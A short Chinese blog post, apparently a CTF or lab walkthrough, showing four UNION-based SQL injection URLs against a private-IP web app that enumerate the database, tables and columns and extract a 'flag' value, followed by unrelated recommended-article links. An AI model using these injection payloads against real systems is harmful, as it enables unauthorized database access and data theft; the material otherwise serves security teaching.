网络安全sql注入实战演示

指针从不野2024-06-16 23:36

http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select 1,2,(database())---库名

http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select1,2,group_concat(table_name) from information_schema.tables where table_schema=database()---表名

http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select 1,2,(group_concat(column_name)) from information_schema.columns where table_name="flag"---列名

http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select 1,2,(select flag from flag)---值

相关推荐
ShoreKiten5 小时前
ctfshowweb351-360
web安全·ssrf
白帽子凯哥哥9 小时前
湖南网安基地:国家级实战化网安人才培养的“黄埔军校”
web安全·信息安全·零基础·渗透测试·安全服务
迎仔9 小时前
10-网络安全监控与事件响应:数字世界的智能监控与应急系统
网络·安全·web安全
kali-Myon13 小时前
2025春秋杯网络安全联赛冬季赛-day2
python·安全·web安全·ai·php·pwn·ctf
独行soc13 小时前
2026年渗透测试面试题总结-19(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
kali-Myon14 小时前
2025春秋杯网络安全联赛冬季赛-day1
java·sql·安全·web安全·ai·php·web
kali-Myon14 小时前
2025春秋杯网络安全联赛冬季赛-day3
python·安全·web安全·ai·php·web·ctf
迎仔15 小时前
05-AI与网络安全
人工智能·安全·web安全
临水逸16 小时前
一次路径穿越漏洞引发的NAS安全危机:飞牛fnOS漏洞深度剖析与用户自救指南
网络·安全·web安全
JMchen12317 小时前
Android网络安全实战:从HTTPS到双向认证
android·经验分享·网络协议·安全·web安全·https·kotlin
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03openclaw配置教程(linux+局域网ollama)04UV安装并设置国内源05Linux下V2Ray安装配置指南06AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南07openclaw使用nginx反代部署过程 与disconnected (1008): pairing required解决08在Trae中使用Pencil MCP09Claude Code Skills 实用使用手册10OpenClaw Chrome扩展使用教程 - 浏览器中继控制